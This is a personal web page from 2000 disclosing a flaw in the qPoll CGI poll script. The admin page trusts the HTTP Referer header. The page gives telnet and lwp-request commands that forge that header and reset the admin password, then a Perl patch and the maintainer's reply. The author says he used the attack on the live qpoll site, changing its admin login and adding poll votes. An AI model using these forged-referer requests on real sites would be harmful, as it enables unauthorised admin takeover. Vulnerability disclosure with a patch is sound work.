qPoll bug


David Ljung Madison, 9/22/2000:
  I was looking for a web-based voting/survey system for a friend
  of mine and came across qpoll.  I found a security bug with the
  admin login of qpoll, and tried it on the qpoll home page and managed
  to succeed.  This page describes the hack as well as a fix for qpoll.

David Ljung Madison, 10/2/2001:
  The home page for qpoll has disappeared - you kind find a copy of
  version 3.1 on Marginal Hacks:
    http://MarginalHacks.com/#qPoll

##################################################

The security hole in qpoll
--------------------------

http://ethereal.virtualave.net/soft/qpoll/demos.html

Qpoll has a security hole in it's admin/login page.

First I figured out where the admin program was for the qpoll 
homepage by finding the qpoll cgi script from a sample poll and then 
replacing it with the name of the admin program.

Qpoll relies on HTTP_REFERER for security, which is extremely easy to hack.
Since the web server relies on the client (the browser) to inform it of the
last page visited, you can easily fake the HTTP_REFERER value by hand:

--------------------------------------------------
% telnet somedomain.com 80
GET http://somedomain.com/some/page.html
Referer: http://madeup.com/fake/referer.html

--------------------------------------------------

Even easier, you can automate this with scripts that allow you to
manually specify headers, such as lwp-request (a.k.a. 'GET'):

% GET -H 'Referer: http://madeup.com/fake/referer.html'

The admin form creates a new password file by submitting
a 'process=new' request with the login/password information as well.

So we force a 'PUT' method with the fake referer:  (one line)

% echo "process=new&name=dave&password=dave\c" | \
    GET -m PUT -H 'Referer: ' 

So it gets the form data for a new login, and thinks that it came from itself.
(For the sake of the creator of qpoll, I used a different login/password)

##################################################

Patch:

This is an easy fix.  The docs say that the only way to change password
is to remove the file.  So (in version 3.1) in qpadmin31.pl we just
add a check for that file.  The Registration() routine has the following:

  if (  ) {
    ...
  } else {
    ...
  }

We simply add:

  if (  ) {
    ...
  } elsif (-e $qpadmin_pswd) {
      &Header("SECURITY NOTICE:  Breakin attempt");
      &Footer();
  } else {
    ...
  }

Then the only possible breakin would be during the race condition
between removing the password file and logging in for the first time,
though this would be difficult and immediately obvious to the admin.


##################################################

Changes I made to at the qpoll home page (so they can be reversed):

http://ethereal.virtualave.net/soft/qpoll/music.html:  (Poll #4)
  Added "David Ljung Madison" entry to bottom with many votes

I also changed the admin login/password, of course.  The old login can't
be retrieved through this security hole, only changed.

##################################################

I emailed the creator of qpoll, Taro Sato about the bug and he's a great guy:

--
> Oh man, it's so nice of you to let me know.  I'm actually in the 
> process of rewriting the whole code from scratch, although slowed by 
> various school related tasks.  There should be more improvements.  I 
> hope I'll come up with a more solid code.  Meanwhile I'll try 
> releasing a patch ASAP.
> 
> I'm thankful enough that I even want to mention your name in special 
> thanks and stuff, but i guess you want to retain something of 
> anonymity???
> 
> Thank you for your time,
> Taro
--

And he even managed to flatter me when we discussed changes to qpoll,
which gets him plenty of props as well:

--
> If I do end up adding IP check, I hope it will stand a challenge from 
> a guy like you (I don't mean it.  I know you can find any glitch).  :)
> 
> Anyway, it was really a cool suggestion from a guy from Transmeta.  
> Hopefully, it'll save and protect many users, and for that I am very 
> grateful.  I tell you, but even this kind of little program gets 
> downloaded many times, so even with the "AS IS" warranty, you feel 
> quite a bit of responsibility for it.  I'd take a l ittle humor if it 
> saves users.
--

Great sense of software ownership - we need more coders like that.  :)